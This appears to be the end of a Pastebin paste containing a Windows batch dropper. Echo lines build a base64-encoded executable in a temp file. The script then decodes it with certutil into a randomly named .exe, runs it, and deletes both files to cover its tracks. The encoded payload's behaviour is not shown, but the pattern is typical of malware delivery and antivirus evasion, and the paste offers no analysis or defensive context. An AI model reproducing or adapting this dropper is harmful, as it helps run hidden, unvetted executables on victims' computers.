cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0nd2luMzInIG5hbWU9J01pY3Jvc29mdC5XaW5kb3dzLkNvbW1vbi1Db250cm9scycgdmVyc2lvbj0nNi4wLjAuMCcgcHJvY2Vzc29yQXJjaGl0ZWN0dXJlPScqJyBwdWJsaWNLZXlUb2tlbj0nNjU5NWI2NDE0NGNjZjFkZicgbGFuZ3VhZ2U9JyonIC8+DQogICAgPC9kZXBlbmRlbnRBc3NlbWJseT4NCiAgPC9kZXBlbmRlbmN5Pg0KPC9hc3NlbWJseT4NCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAGABAAAPMBkwJDAzMFwwbjCWMKowtjDOMNUw2jDjMPcwBzElMSsxNDE6MUIxSzFhMWwxdTF7MYExlzGjMbkxzTHkMfoxAzINMhgyKTIwMjYyRDJKMlQygzKOMpUypzLSMtwy8jL/MgYzDDMYMyMzKjOVM5oznzOxM90z4jMLNBM0LjQ2NDw0RDRJNFQ0XzRvNK40tjS+NNI02jTfNOk09zQENQo1EDUWNSA1KDUuNTU1RDVSNVw1kDWXNZw1pDXMNdI12DXeNQE2TDZqNnM2gDahNqk2xzbTNvk2/zYFNws3JjcsNzM3UjdZN183iDeUN6I3GjgkODY4PDhCOEg4hDivOLg4xTjqOPI4AzkJOQ85FTk2OVM5XTlpOXY5>>%f%
 8. echo iDmiOaw5zDnZOeY59DkPOig6RzpOOl06ZTptOnc6fDqGOo06uDrLOug6/ToQO1I7XTtvO3U7gTuGO5M7rjsAAABAAACUAAAAADAEMAgwDDAQMBQwGDAcMCAwJDAoMCwwMDA0MDgwPDBAMEQwSDBMMFAwVDBYMFwwYDBkMGgwbDBwMHQweDB8MIAwhDCIMIwwkDCUMJgwnDCgMKQwqDCsMLAwtDC4MLwwwDDIMMww6DDsMAgxDDEoMSwxSDFMMWgxbDGIMYwxqDGsMcgxzDHoMewxAAAAAAAAAAAAAAAAAAA=>>%f%
 9. set f1=%tmp%\%random%%random%%random%%random%.exe
 10. certutil -decode "%f%" %f1%>nul
 11. del %f%
 12. start /W "" "%f1%"
 13. del "%f1%"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top